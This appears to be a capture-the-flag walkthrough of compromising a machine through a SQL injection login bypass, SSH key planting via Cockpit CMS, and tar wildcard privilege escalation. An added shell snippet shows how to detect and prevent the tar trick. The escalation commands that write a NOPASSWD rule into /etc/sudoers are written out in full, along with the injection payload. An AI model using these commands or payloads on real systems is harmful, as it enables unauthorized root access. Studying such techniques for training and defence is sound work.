Enumeration

Nmap

The initial Nmap scan revealed that the HTTP, SSH and 9090 ports were open.

00 - nmap

WEB Enumeration

The website at port 80 seemed like a dummy website. I did directory enumeration and could not find any useful folder.

01 - website port 80

Then I checked 9090; it was also a website. It was a Cockpit CMS website, and I tried some known vulnerabilities, but none of them worked.

02 - 9090 port

Then I used a different wordlist, raft-medium-files.txt from SecLists, which includes common files, and it worked. I found a login.php file on port 80.

03 - login website

04 - website

Exploitation

SQL Injection

At first I tried a simple ' to check if it would throw any errors. And indeed it threw an error.

05 - error

Then I tried OR 1=1, AND 1=1 and other common methods, but all of them were blocked.

06 - blocked

Then I simply tried admin' -- - and that was it: I simply got inside the website and obtained the user passwords.

07 - 0 sqli

07 - 1 sqli

Cockpit CMS (Add SSH Public Key)

Then I base64-decoded the user passwords and logged in to Cockpit CMS.

08 - logged in

Then I simply added my local id_rsa.pub (SSH public key) to Cockpit CMS.

09 - ssh public key

And with this I got the user and its flag.

10 - user flag

Privilege Escalation

Tar Wildcard Abuse

sudo -l revealed I could run the tar binary with a wildcard (*) as root.

11 - sudo l

So it was simple. I applied the steps of the tar wildcard abuse:

# working directory whose contents the privileged tar will glob (absolute path, so it does not depend on the current directory)
mkdir -p /tmp/tar_test
cd /tmp/tar_test
# script that tar's checkpoint action will execute
echo 'echo "james ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
# file names that the shell wildcard expands into tar options
echo "" > "--checkpoint-action=exec=sh root.sh"
echo "" > --checkpoint=1
# run the permitted sudo command; * now expands to the option-like file names
sudo /usr/bin/tar -czvf /tmp/backup.tar.gz *

And applying these steps got me NOPASSWD sudo for all commands.
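As an added example that is not part of the original writeup, here is the defender's side of the same technique: a check that flags option-like file names in a directory a privileged tar will glob, and an archive invocation that passes a directory path instead of a shell wildcard so such names stay plain data. It assumes POSIX sh and GNU tar; the directory names and the suggested sudoers line are illustrative.

```shell
#!/bin/sh
# Count entries in "$1" whose names begin with "-". When a privileged
# "tar ... *" expands this directory, such names become tar options
# (e.g. --checkpoint-action=exec=...), so any hit should be investigated.
# Suspicious names go to stderr; the count is the function's stdout.
count_option_like_names() {
    dir="$1"
    n=0
    for entry in "$dir"/*; do
        [ -e "$entry" ] || continue          # empty dir: glob stays literal
        case "${entry##*/}" in
            -*) n=$((n + 1)); printf 'suspicious: %s\n' "$entry" >&2 ;;
        esac
    done
    echo "$n"
}

# Archive "$1" into "$2" without shell globbing: -C changes into the
# directory and "." names its contents, so a file called --checkpoint=1
# is stored as data rather than parsed as an option.
# A sudoers rule granting only this fixed form (illustrative path) would be:
#   james ALL=(root) NOPASSWD: /usr/bin/tar -czf /tmp/backup.tar.gz -C /var/www/html .
safe_archive() {
    dir="$1"
    out="$2"
    tar -czf "$out" -C "$dir" .
}
```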

12 - tar wildcard abuse

I then simply got root.

13 - root
